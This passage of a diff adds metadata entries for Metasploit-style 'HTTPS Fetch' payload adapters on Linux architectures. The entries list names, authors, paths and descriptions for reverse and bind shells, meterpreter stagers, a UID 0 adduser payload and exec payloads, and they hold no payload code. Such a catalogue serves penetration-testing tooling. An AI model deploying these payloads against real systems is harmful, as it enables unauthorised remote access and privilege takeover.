"payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/ppc64/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/ppc64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:15 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64", + "adapted_refname": "linux/ppc64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/ppc64/shell_find_port": { + "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/https/ppc64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:15 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64", + "adapted_refname": "linux/ppc64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/https/ppc64/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/ppc64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:15 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64", + "adapted_refname": "linux/ppc64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/ppc64le/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/ppc64le/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/ppc64le/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/ppc64le/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/ppc64le/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/exec", + "staged": false + }, + "payload_cmd/linux/https/x64/meterpreter/bind_tcp": { + "name": "HTTPS Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/https/x64/meterpreter/reverse_sctp": { + "name": "HTTPS Fetch, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/https/x64/meterpreter/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/https/x64/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/https/x64/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/x64/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/https/x64/meterpreter_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/pingback_bind_tcp": { + "name": "HTTPS Fetch, Linux x64 Pingback, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/x64/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nAccept a connection from attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/pingback_reverse_tcp": { + "name": "HTTPS Fetch, Linux x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/shell/bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/https/x64/shell/reverse_sctp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/https/x64/shell/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/https/x64/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/https/x64/shell_bind_ipv6_tcp": { + "name": "HTTPS Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/https/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/shell_bind_tcp_random_port": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/https/x64/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/https/x64/shell_find_port": { + "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/https/x64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "mak" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/https/x64/shell_reverse_ipv6_tcp": { + "name": "HTTPS Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/https/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/adduser": { + "name": "HTTPS Fetch, Linux Add User", + "fullname": "payload/cmd/linux/https/x86/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "vlad902 ", + "spoonm " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/adduser", + "staged": false + }, + "payload_cmd/linux/https/x86/chmod": { + "name": "HTTPS Fetch, Linux Chmod", + "fullname": "payload/cmd/linux/https/x86/chmod", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nRuns chmod on specified file with specified mode", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/chmod", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/chmod", + "staged": false + }, + "payload_cmd/linux/https/x86/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "vlad902 ", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/exec", + "staged": false + }, + "payload_cmd/linux/https/x86/generic/debug_trap": { + "name": "HTTPS Fetch, Generic x86 Debug Trap", + "fullname": "payload/cmd/linux/https/x86/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "robert " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nGenerate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "generic/debug_trap", + "staged": false + }, + "payload_cmd/linux/https/x86/generic/tight_loop": { + "name": "HTTPS Fetch, Generic x86 Tight Loop", + "fullname": "payload/cmd/linux/https/x86/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "jduck " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nGenerate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/generic/tight_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "generic/tight_loop", + "staged": false + }, + "payload_cmd/linux/https/x86/meterpreter/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for an IPv6 